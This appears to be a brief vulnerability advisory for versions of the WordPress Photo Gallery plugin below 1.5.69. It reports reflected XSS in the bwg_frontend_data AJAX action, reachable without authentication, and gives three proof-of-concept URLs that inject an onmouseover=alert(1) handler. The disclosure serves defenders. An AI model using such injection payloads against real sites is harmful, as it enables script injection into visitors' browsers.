The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag;=" onmouseover=alert(1)> https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme;_id=" onmouseover=alert(1)> https://example.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery;_id=1" onmouseover=alert(1)>
CPE | Name | Operator | Version |
---|---|---|---|
photo-gallery | lt | 1.5.69 |